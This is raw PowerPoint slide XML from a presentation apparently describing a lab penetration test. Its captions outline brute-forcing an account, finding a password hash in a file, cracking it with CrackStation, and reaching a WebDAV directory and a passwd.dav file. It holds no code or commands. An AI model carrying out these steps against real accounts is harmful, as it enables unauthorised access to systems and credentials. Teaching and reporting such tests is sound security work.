            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFAB40">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BBDEA93-401D-4527-B275-3229E0739D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051437" y="1022167"/>
            <a:ext cx="5041126" cy="684672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A43477A-41B5-402F-A08C-C46C1829AC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313899" y="2241182"/>
            <a:ext cx="3143687" cy="1309870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B662819-2C70-4088-BE47-CD3647E2A3DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243519" y="1983048"/>
            <a:ext cx="3214067" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Logging into Ashton's account to access the “secret folder”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEC16E4-361F-4A43-B233-B2A70E9AA87F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97A416E-43F8-4B54-B80C-EF8DF2F429DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811922" y="2571750"/>
            <a:ext cx="5018179" cy="1309870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76174969-3BD1-41D4-B0D7-5500C9C592E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278727" y="2322651"/>
            <a:ext cx="4084568" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Accessing the “connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>corp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> server” file and discovering the password hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA86901-B78A-4A3C-95A5-A260DAC8F530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151427" y="3193576"/>
            <a:ext cx="1678674" cy="102358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="635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0" name="Rectangle: Rounded Corners 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0312B728-B126-4CA2-93E9-7DB764105C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151427" y="3193576"/>
            <a:ext cx="1678674" cy="102358"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2F7C03-13BD-4726-A6E1-8C169D5600A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733734" y="2886092"/>
            <a:ext cx="338643" cy="101413"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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03239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10;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18627C6F-A102-448B-B562-3C5807292391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="0"/>
            <a:ext cx="9169400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="182875" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBB1E05-084F-4F2D-BD14-0240DA2C997A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7504DF46-520E-4113-B4C6-89F6EE50DA60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Google Shape;1114;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F8451E-C18C-4927-9262-FFF0E332B589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;1115;p62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35100814-E093-4251-AE3C-B18F37FB6985}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2" name="Google Shape;1116;p62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED4BF13-5295-47C4-B632-D075073ADDB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD2B1A2-BE47-4058-A328-ACB9232794C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215814" y="1021593"/>
            <a:ext cx="3906368" cy="2373277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1167D45B-5C28-422B-AE03-49E2B3BBE200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126714" y="754212"/>
            <a:ext cx="4084568" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Cracked the hash with the help of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CrackStation</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFAB40">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81246D0-97BC-4CE2-8620-25F29038A755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483624" y="1502460"/>
            <a:ext cx="2971021" cy="1242839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19C7E83C-293E-490D-A92A-57290C3EC39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357953" y="4026851"/>
            <a:ext cx="7013227" cy="844525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A668661-AFA5-4F5E-A8DB-C9DC7EC4AEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6111224" y="1215345"/>
            <a:ext cx="1715820" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Accessedthe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFAB40">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BDECA0F-6A4C-4EE4-8535-61ABB7581CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065532" y="3714359"/>
            <a:ext cx="1741590" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Discovered the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFAB40">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFAB40">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle: Rounded Corners 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D9D508C-1F15-4BF9-A7CB-631728BCB299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357953" y="4471220"/>
            <a:ext cx="1873858" cy="102358"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Rounded Corners 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC46B84-936A-49FD-98D7-1C7225A12A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812629" y="2088671"/>
            <a:ext cx="335047" cy="131018"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
